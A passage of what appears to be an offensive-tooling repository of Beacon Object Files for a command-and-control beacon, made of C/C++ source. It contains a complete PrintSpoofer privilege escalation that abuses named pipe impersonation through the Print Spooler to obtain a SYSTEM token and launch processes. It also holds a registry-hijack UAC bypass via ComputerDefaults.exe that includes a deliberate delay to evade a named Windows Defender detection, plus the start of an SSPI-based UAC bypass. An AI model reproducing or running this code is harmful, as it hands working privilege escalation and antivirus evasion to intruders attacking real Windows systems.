DECLSPEC_IMPORT HGLOBAL  WINAPI ADVAPI32$LookupAccountSidA(LPCSTR lpSystemName, PSID Sid, LPSTR Name, LPDWORD cchName, LPSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse);
DECLSPEC_IMPORT int  WINAPI MSVCRT$wcscmp(const wchar_t* string1, const wchar_t* string2);
DECLSPEC_IMPORT HRESULT  WINAPI   OLE32$CLSIDFromString(LPCWSTR, LPCLSID);
DECLSPEC_IMPORT HRESULT  WINAPI   OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv);
DECLSPEC_IMPORT VOID     WINAPI   OLE32$CoUninitialize();
DECLSPEC_IMPORT HRESULT	 WINAPI	  OLE32$CoInitialize(LPVOID pvReserved);
DECLSPEC_IMPORT HRESULT	 WINAPI	  OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel,  DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3);
DECLSPEC_IMPORT LPVOID	WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
DECLSPEC_IMPORT BOOL	WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
DECLSPEC_IMPORT HANDLE	WINAPI KERNEL32$GetProcessHeap();
DECLSPEC_IMPORT HANDLE WINAPI  KERNEL32$GetCurrentProcess(VOID);
DECLSPEC_IMPORT DWORD	WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI SIZE_T WINAPI MSVCRT$strlen(const char* str);
WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
WINBASEAPI errno_t __cdecl MSVCRT$mbstowcs_s(size_t* pReturnValue, wchar_t* wcstr, size_t sizeInWords, const char* mbstr, size_t count);
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetUserAdd(LPWSTR, DWORD, PBYTE, PDWORD);
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR, LPCWSTR, DWORD, PBYTE, DWORD);
}

================================================
FILE: Elevation-BOF/printspoofer/printspoofer.c
================================================
#include <windows.h>
#include <stdio.h>
#include "bofdefs.h"
#include "beacon.h"

// Function pointers for WINSPOOL functions (dynamically loaded)
typedef BOOL (WINAPI *OpenPrinterW_t)(LPWSTR, LPHANDLE, LPPRINTER_DEFAULTSW);
typedef BOOL (WINAPI *ClosePrinter_t)(HANDLE);
typedef DWORD (WINAPI *XcvDataW_t)(HANDLE, PCWSTR, PBYTE, DWORD, PBYTE, DWORD, PDWORD, PDWORD);

OpenPrinterW_t pOpenPrinterW = NULL;
ClosePrinter_t pClosePrinter = NULL;
XcvDataW_t pXcvDataW = NULL;

// Load WINSPOOL functions dynamically
BOOL LoadWinspoolFunctions()
{
    HMODULE hWinspool = KERNEL32$LoadLibraryA("winspool.drv");
    if (!hWinspool)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to load winspool.drv. Error: %d\n", KERNEL32$GetLastError());
        return FALSE;
    }

    pOpenPrinterW = (OpenPrinterW_t)KERNEL32$GetProcAddress(hWinspool, "OpenPrinterW");
    pXcvDataW = (XcvDataW_t)KERNEL32$GetProcAddress(hWinspool, "XcvDataW");
    pClosePrinter = (ClosePrinter_t)KERNEL32$GetProcAddress(hWinspool, "ClosePrinter");

    if (!pOpenPrinterW || !pXcvDataW || !pClosePrinter)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get WINSPOOL function addresses\n");
        return FALSE;
    }

    return TRUE;
}

BOOL IsTokenSystem(HANDLE hToken)
{
    DWORD dwLength = 0;
    PTOKEN_USER user = NULL;
    LPWSTR sid_name = NULL;
    SECURITY_IMPERSONATION_LEVEL ImpersonationLevel = SecurityAnonymous;
    DWORD Size;
    wchar_t* impersonationLevelstr = NULL;
    BOOL isSystem = FALSE;

    ADVAPI32$GetTokenInformation(hToken, TokenUser, NULL, 0, &dwLength);
    if (KERNEL32$GetLastError() == ERROR_INSUFFICIENT_BUFFER)
    {
        user = (PTOKEN_USER)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, dwLength);
        if (user == NULL)
        {
            return FALSE;
        }
    }
    else
    {
        return FALSE;
    }

    if (!ADVAPI32$GetTokenInformation(hToken, TokenUser, user, dwLength, &dwLength))
    {
        BeaconPrintf(CALLBACK_ERROR, "Error getting token user %d\n", KERNEL32$GetLastError());
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, user);
        return FALSE;
    }

    if (!ADVAPI32$ConvertSidToStringSidW(user->User.Sid, &sid_name))
    {
        BeaconPrintf(CALLBACK_ERROR, "Error converting SID %d\n", KERNEL32$GetLastError());
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, user);
        return FALSE;
    }

    Size = sizeof(SECURITY_IMPERSONATION_LEVEL);
    ADVAPI32$GetTokenInformation(hToken, TokenImpersonationLevel, &ImpersonationLevel, sizeof(SECURITY_IMPERSONATION_LEVEL), &Size);

    switch (ImpersonationLevel)
    {
    case SecurityAnonymous:
        impersonationLevelstr = (wchar_t*)L"Anonymous"; break;
    case SecurityIdentification:
        impersonationLevelstr = (wchar_t*)L"Identification"; break;
    case SecurityImpersonation:
        impersonationLevelstr = (wchar_t*)L"Impersonation"; break;
    case SecurityDelegation:
        impersonationLevelstr = (wchar_t*)L"Delegation"; break;
    }

    if (!MSVCRT$wcscmp(sid_name, L"S-1-5-18") && ImpersonationLevel >= SecurityImpersonation)
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Obtained SYSTEM (%ls) token with impersonation level: %S\n", sid_name, impersonationLevelstr);
        isSystem = TRUE;
    }
    else
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Obtained (%ls) token with impersonation level: %S\n", sid_name, impersonationLevelstr);
        isSystem = FALSE;
    }

    // Cleanup
    KERNEL32$LocalFree(sid_name);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, user);

    return isSystem;
}

// Create Named Pipe
HANDLE CreateNamedPipeA_Custom(LPCSTR lpName)
{
    HANDLE hPipe = KERNEL32$CreateNamedPipeA(
        lpName,
        PIPE_ACCESS_DUPLEX,
        PIPE_TYPE_BYTE | PIPE_WAIT,
        10,
        2048,
        2048,
        0,
        NULL
    );

    if (hPipe == INVALID_HANDLE_VALUE)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] CreateNamedPipe failed. Error: %d\n", KERNEL32$GetLastError());
        return INVALID_HANDLE_VALUE;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Named Pipe created: %s\n", lpName);
    return hPipe;
}

// Trigger Print Spooler connection
BOOL TriggerNamedPipeConnection(LPCSTR lpName)
{
    DWORD maxPathBytes = 260 * sizeof(WCHAR);
    WCHAR* lpPrinterName = (WCHAR*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, maxPathBytes);
    WCHAR* lpPortName = (WCHAR*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, maxPathBytes);
    BYTE* output = NULL;

    if (!lpPrinterName || !lpPortName)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed\n");
        if (lpPrinterName) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpPrinterName);
        if (lpPortName) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpPortName);
        return FALSE;
    }
    // Convert pipe name to wide string
    int len = MSVCRT$strlen(lpName);
    // Manual conversion from ANSI to WIDE
    for (int i = 0; i < len && i < 259; i++)
        lpPrinterName[i] = (WCHAR)lpName[i];
    lpPrinterName[len] = L'\0';

    // Copy to port name
    for (int i = 0; i <= len; i++)
        lpPortName[i] = lpPrinterName[i];

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Triggering named pipe connection via Print Spooler...\n");

    // Try to add a printer port - this will cause Print Spooler to connect
    HANDLE hPrinter = NULL;
    PRINTER_DEFAULTS pd;
    pd.pDatatype = NULL;
    pd.pDevMode = NULL;
    pd.DesiredAccess = SERVER_ACCESS_ADMINISTER;

    BOOL success = FALSE;

    if (pOpenPrinterW(L",XcvMonitor Local Port", &hPrinter, &pd))
    {
        DWORD dwNeeded = 0, dwStatus = 0;
        DWORD outputSize = 4096;
        output = (BYTE*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, outputSize);

        if (!output)
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Output buffer allocation failed\n");
            pClosePrinter(hPrinter);
            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpPrinterName);
            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpPortName);
            return FALSE;
        }

        // Add port using XcvData
        DWORD result = pXcvDataW(
            hPrinter,
            L"AddPort",
            (PBYTE)lpPortName,
            (MSVCRT$wcslen(lpPortName) + 1) * sizeof(WCHAR),
            output,
            outputSize,
            &dwNeeded,
            &dwStatus
        );

        pClosePrinter(hPrinter);

        if (result == ERROR_SUCCESS || dwStatus == ERROR_SUCCESS)
        {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Triggered Print Spooler connection\n");
            success = TRUE;
        }
        else
        {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] XcvDataW returned: %d, status: %d (This is often expected)\n", result, dwStatus);
            // Even if this fails, the connection might have been triggered
            success = TRUE;
        }

        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, output);
    }
    else
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] OpenPrinter failed. Error: %d\n", KERNEL32$GetLastError());
        success = FALSE;
    }

    // Cleanup
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpPrinterName);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpPortName);

    return success;
}

// Wait for connection and impersonate
BOOL WaitForConnection(HANDLE hPipe, DWORD timeout)
{
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Waiting for connection (timeout: %d ms)...\n", timeout);

    OVERLAPPED* pOverlapped = (OVERLAPPED*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(OVERLAPPED));
    if (!pOverlapped)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed\n");
        return FALSE;
    }

    pOverlapped->hEvent = KERNEL32$CreateEventA(NULL, TRUE, FALSE, NULL);

    if (pOverlapped->hEvent == NULL)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] CreateEvent failed. Error: %d\n", KERNEL32$GetLastError());
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pOverlapped);
        return FALSE;
    }

    BOOL result = KERNEL32$ConnectNamedPipe(hPipe, pOverlapped);
    DWORD dwError = KERNEL32$GetLastError();

    if (!result)
    {
        if (dwError == ERROR_IO_PENDING)
        {
            DWORD dwWait = KERNEL32$WaitForSingleObject(pOverlapped->hEvent, timeout);
            if (dwWait == WAIT_TIMEOUT)
            {
                BeaconPrintf(CALLBACK_ERROR, "[-] Timeout waiting for connection\n");
                KERNEL32$CloseHandle(pOverlapped->hEvent);
                KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pOverlapped);
                return FALSE;
            }
            else if (dwWait == WAIT_OBJECT_0)
            {
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Client connected!\n");
            }
            else
            {
                BeaconPrintf(CALLBACK_ERROR, "[-] WaitForSingleObject failed. Error: %d\n", KERNEL32$GetLastError());
                KERNEL32$CloseHandle(pOverlapped->hEvent);
                KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pOverlapped);
                return FALSE;
            }
        }
        else if (dwError == ERROR_PIPE_CONNECTED)
        {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Client already connected!\n");
        }
        else
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] ConnectNamedPipe failed. Error: %d\n", dwError);
            KERNEL32$CloseHandle(pOverlapped->hEvent);
            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pOverlapped);
            return FALSE;
        }
    }

    KERNEL32$CloseHandle(pOverlapped->hEvent);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pOverlapped);
    return TRUE;
}

#ifdef BOF
void go(char* args, int len)
{
    datap parser;
    int use_token = 0;
    LPWSTR run_program = NULL;

    BeaconDataParse(&parser, args, len);
    use_token = BeaconDataInt(&parser);
    run_program = (LPWSTR)BeaconDataExtract(&parser, NULL);

    if ((use_token && run_program[0] != L'\0') || (!use_token && run_program[0] == L'\0'))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Use only --token or --run\n");
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] PrintSpoofer - Local Privilege Escalation\n");
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Technique: Named Pipe Impersonation via Print Spooler\n\n");
    // Load WINSPOOL functions dynamically
    if (!LoadWinspoolFunctions())
    {
        return;
    }

    // Generate random pipe name
    DWORD pipeNameSize = 260;
    CHAR* pipeName = (CHAR*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, pipeNameSize);
    if (!pipeName)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed\n");
        return;
    }

    DWORD randomValue;
    ADVAPI32$SystemFunction036(&randomValue, sizeof(randomValue));  // RtlGenRandom
    MSVCRT$sprintf(pipeName, "\\\\.\\pipe\\printspoof%08x", randomValue);

    // Create Named Pipe
    HANDLE hPipe = CreateNamedPipeA_Custom(pipeName);
    if (hPipe == INVALID_HANDLE_VALUE)
    {
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pipeName);
        return;
    }

    // Trigger Print Spooler connection
    if (!TriggerNamedPipeConnection(pipeName))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to trigger connection\n");
        KERNEL32$CloseHandle(hPipe);
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pipeName);
        return;
    }

    // Wait for connection (5 seconds timeout)
    if (!WaitForConnection(hPipe, 5000))
    {
        KERNEL32$CloseHandle(hPipe);
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pipeName);
        return;
    }

    // Impersonate the connected client
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Attempting to impersonate client...\n");
    if (!ADVAPI32$ImpersonateNamedPipeClient(hPipe))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] ImpersonateNamedPipeClient failed. Error: %d\n", KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hPipe);
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pipeName);
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Impersonation successful!\n");

    // Get current thread token
    HANDLE hToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] OpenThreadToken failed. Error: %d\n", KERNEL32$GetLastError());
        ADVAPI32$RevertToSelf();
        KERNEL32$CloseHandle(hPipe);
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pipeName);
        return;
    }

    // Check if it's a SYSTEM token
    BOOL isSystem = IsTokenSystem(hToken);

    if (!isSystem)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to obtain SYSTEM token\n");
        KERNEL32$CloseHandle(hToken);
        ADVAPI32$RevertToSelf();
        KERNEL32$CloseHandle(hPipe);
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pipeName);
        return;
    }

    // Duplicate token to primary
    HANDLE hPrimaryToken = NULL;
    if (!ADVAPI32$DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hPrimaryToken))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] DuplicateTokenEx failed. Error: %d\n", KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hToken);
        ADVAPI32$RevertToSelf();
        KERNEL32$CloseHandle(hPipe);
        KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pipeName);
        return;
    }

    if (use_token)
    {
        // Apply token to current thread
        if (!ADVAPI32$SetThreadToken(NULL, hToken))
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] SetThreadToken failed. Error: %d\n", KERNEL32$GetLastError());
        }
        else
        {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] SYSTEM token applied to current thread!\n");
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Impersonate to SYSTEM succeeded\n");
        }
    }
    else
    {
        // Run program with SYSTEM token
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Starting process: %ls\n", run_program);

        STARTUPINFOW* pSi = (STARTUPINFOW*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(STARTUPINFOW));
        PROCESS_INFORMATION* pPi = (PROCESS_INFORMATION*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(PROCESS_INFORMATION));

        if (!pSi || !pPi)
        {
            BeaconPrintf(CALLBACK_ERROR, "[-] Memory allocation failed\n");
            if (pSi) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pSi);
            if (pPi) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pPi);
        }
        else
        {
            pSi->cb = sizeof(STARTUPINFOW);

            if (!ADVAPI32$CreateProcessWithTokenW(
                hPrimaryToken,
                LOGON_WITH_PROFILE,
                NULL,
                run_program,
                0,
                NULL,
                NULL,
                pSi,
                pPi))
            {
                BeaconPrintf(CALLBACK_ERROR, "[-] CreateProcessWithTokenW failed. Error: %d\n", KERNEL32$GetLastError());
            }
            else
            {
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Process created with PID: %d\n", pPi->dwProcessId);
                KERNEL32$CloseHandle(pPi->hProcess);
                KERNEL32$CloseHandle(pPi->hThread);
            }

            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pSi);
            KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pPi);
        }
    }

    // Cleanup
    KERNEL32$CloseHandle(hPrimaryToken);
    KERNEL32$CloseHandle(hToken);
    if (!use_token)
    {
        ADVAPI32$RevertToSelf();
    }
    KERNEL32$CloseHandle(hPipe);
    KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pipeName);

    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] PrintSpoofer completed\n");
}
#endif


================================================
FILE: Elevation-BOF/uac_regshellcmd/RegistryShellCommandBOF.c
================================================
// x86_64-w64-mingw32-gcc -c RegistryShellCommandBOF.c -w -o /share/test.o
// .\COFFLoader64.exe go .\test.o 2f0000002b000000433a5c55736572735c72616e64795c4465736b746f705c746573745c6d657373616765626f782e65786500
#include <windows.h>
#include <stdio.h>
#include <shlwapi.h>
#include "beacon.h"

// define required winapi functions
DECLSPEC_IMPORT WINBASEAPI VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds);
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath);
DECLSPEC_IMPORT WINBASEAPI wchar_t WINAPI MSVCRT$wcscat(wchar_t * destination, const wchar_t * source);
DECLSPEC_IMPORT WINBASEAPI LPSTR WINAPI MSVCRT$strcat(char *strDestination, const char *strSource);
DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(void);
DECLSPEC_IMPORT WINBASEAPI char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src);
DECLSPEC_IMPORT WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY hKey);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegCreateKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegDeleteTreeA(HKEY base, LPCSTR subkey);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegSaveKeyExA(HKEY hKey,LPCSTR lpFile,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD Flags);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,CONST BYTE *lpData,DWORD cbData);
DECLSPEC_IMPORT WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult);
DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI SHELL32$ShellExecuteExA(SHELLEXECUTEINFOA *pExecInfo);

int go(char * args, unsigned long length) {
    // get arguments
    datap parser;
    BeaconDataParse(&parser, args, length);
    unsigned char * cmdPath = BeaconDataExtract(&parser, NULL);

    char tempPath[MAX_PATH] = {0};
    MSVCRT$strcpy(tempPath, cmdPath);

    if(!SHLWAPI$PathFileExistsA(tempPath)){
        BeaconPrintf(CALLBACK_ERROR, "The target executable does not exist on host!\n");
        return 1;
    }

    // Create command reg key and/or open handle to it
    HKEY commandKey;
    LSTATUS regStatus = ADVAPI32$RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\Open\\command", &commandKey);
    if (regStatus != 0) {
        BeaconPrintf(CALLBACK_ERROR, "Error creating command registry key!: %d\n", regStatus);
        return 1;
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "Successfully created registry key: HKCU:Software\\Classes\\ms-settings\\Shell\\Open\\command\n");
    }

    // set command reg key to supplied exe on disk
    regStatus = ADVAPI32$RegSetValueExA(commandKey, "", 0, REG_SZ, tempPath, MSVCRT$strlen(tempPath));
    if (regStatus != 0) {
        BeaconPrintf(CALLBACK_ERROR, "Error setting command registry key!: %d\n", regStatus);
        return 1;
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "Successfully set command registry value\n");
    }

    // set DelegateExecute reg key to blank value
    regStatus = ADVAPI32$RegSetValueExA(commandKey, "DelegateExecute", 0, REG_SZ, "", 0);
    if (regStatus != 0) {
        BeaconPrintf(CALLBACK_ERROR, "Error setting DelegateExecute registry key!: %d\n", regStatus);
        return 1;
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "Successfully set DelegateExecute registry value\n");
    }

    ADVAPI32$RegCloseKey(commandKey);

    // Sleep for 10 seconds before executing autoelevated exe to bypass Windows Defender behavioral detection: Behavior:Win32/UACBypassExp.T!proc
    KERNEL32$Sleep(10000);

    // Set variables for SHELLEXECUTEINFO object to execute fodhelper.exe or ComputerDefaults.exe
    SHELLEXECUTEINFOA exInfo;
    exInfo.lpVerb       = "open";
    exInfo.lpFile       = "C:\\Windows\\System32\\ComputerDefaults.exe";
    exInfo.nShow        = 0;
    exInfo.fMask        = SEE_MASK_NOCLOSEPROCESS;
    exInfo.cbSize       = sizeof(SHELLEXECUTEINFO);
    exInfo.hwnd         = 0;
    exInfo.lpParameters = 0;
    exInfo.lpDirectory  = 0;
    exInfo.hInstApp     = 0;

    // Execute the autoelevated exe
    BOOL shRet = SHELL32$ShellExecuteExA(&exInfo);
    if (shRet == FALSE) {
        BeaconPrintf(CALLBACK_ERROR, "Error using ShellExecuteEx!\n");
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "Autoelevated EXE was successfully executed using ShellExecuteEx!\n");
    }

    // Sleep for 2 seconds to make sure registry has been updated
    KERNEL32$Sleep(2000);

    // Open handle to "HKCU:Software\Classes" registry key
    HKEY fullRegKey;
    if (ADVAPI32$RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Classes", 0, KEY_READ | KEY_WRITE | DELETE, &fullRegKey) != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "Error opening Software key!\n");
        return 1;
    }

    // Delete added registry key and all it's sub keys
    regStatus = ADVAPI32$RegDeleteTreeA(fullRegKey, "ms-settings");
    if (regStatus != 0) {
        BeaconPrintf(CALLBACK_ERROR, "Error deleting command registry key!: %d\n", regStatus);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "Successfully deleted registry key: HKCU:Software\\Classes\\ms-settings\\Shell\\Open\\command\n");
    }

    ADVAPI32$RegCloseKey(fullRegKey);

    return 0;
}

================================================
FILE: Elevation-BOF/uac_sspi/SspiUacBypassBOF.cpp
================================================
// x86_64-w64-mingw32-g++ -c SspiUacBypassBOF.cpp -w -o SspiUacBypassBOF.o
#define SECURITY_WIN32

#include <windows.h>
#include <stdio.h>
#include <security.h>

extern "C" {

#include "beacon.h"

    void go(char * args, unsigned long length);

    // for SspiUacBypass
    DECLSPEC_IMPORT     HRESULT  WINAPI     OLE32$CoSetProxyBlanket(IUnknown* pProxy, DWORD dwAuthnSvc, DWORD dwAuthzSvc, OLECHAR* pServerPrincName, DWORD dwAuthnLevel, DWORD dwImpLevel, RPC_AUTH_IDENTITY_HANDLE pAuthInfo, DWORD dwCapabilities);
    DECLSPEC_IMPORT     WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
    DECLSPEC_IMPORT     WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
    DECLSPEC_IMPORT     WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
    DECLSPEC_IMPORT     WINBASEAPI int __cdecl MSVCRT$printf(const char * __restrict__ _Format,...);
    DECLSPEC_IMPORT     WINBASEAPI DWORD WINAPI SECUR32$AcquireCredentialsHandleA(LPSTR, LPSTR, unsigned long, void*, void*, SEC_GET_KEY_FN, void *, PCredHandle, PTimeStamp);
    DECLSPEC_IMPORT     WINBASEAPI DWORD WINAPI SECUR32$InitializeSecurityContextA(PCredHandle, PCtxtHandle, SEC_CHAR*, unsigned long, unsigned long, unsigned long, PSecBufferDesc, unsigned long, PCtxtHandle, PSecBufferDesc, unsigned long *, PTimeStamp);
    DECLSPEC_IMPORT     WINBASEAPI void * WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
    DECLSPEC_IMPORT     WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
    DECLSPEC_IMPORT     WINBASEAPI DWORD WINAPI SECUR32$AcceptSecurityContext(PCredHandle, PCtxtHandle, PSecBufferDesc, unsigned long, unsigned long, PCtxtHandle, PSecBufferDesc, unsigned long *, PTimeStamp);
    DECLSPEC_IMPORT     KSECDDDECLSPEC SECURITY_STATUS SEC_ENTRY SECUR32$QuerySecurityContextToken(PCtxtHandle phContext, void **Token);
    DECLSPEC_IMPORT     WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
    DECLSPEC_IMPORT     WINBASEAPI SECURITY_STATUS WINAPI SECUR32$FreeCredentialsHandle(PCredHandle phCredential);
    DECLSPEC_IMPORT     WINBASEAPI SECURITY_STATUS WINAPI SECUR32$DeleteSecurityContext(PCtxtHandle phContext);
    DECLSPEC_IMPORT     WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
    DECLSPEC_IMPORT     WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(void);
    DECLSPEC_IMPORT     BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE);
    DECLSPEC_IMPORT     WINADVAPI WINBOOL WINAPI ADVAPI32$OpenThreadToken(HANDLE ThreadHandle, DWORD DesiredAccess, BOOL OpenAsSelf, PHANDLE TokenHandle);
    DECLSPEC_IMPORT     WINADVAPI WINBOOL WINAPI ADVAPI32$RevertToSelf();
    DECLSPEC_IMPORT     WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentThread(VOID);
    DECLSPEC_IMPORT     WINADVAPI BOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
    DECLSPEC_IMPORT     WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);

    // for CreateSvcRpc
    DECLSPEC_IMPORT     WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
    DECLSPEC_IMPORT     WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str);
    DECLSPEC_IMPORT     WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
    DECLSPEC_IMPORT     WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
    DECLSPEC_IMPORT     BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
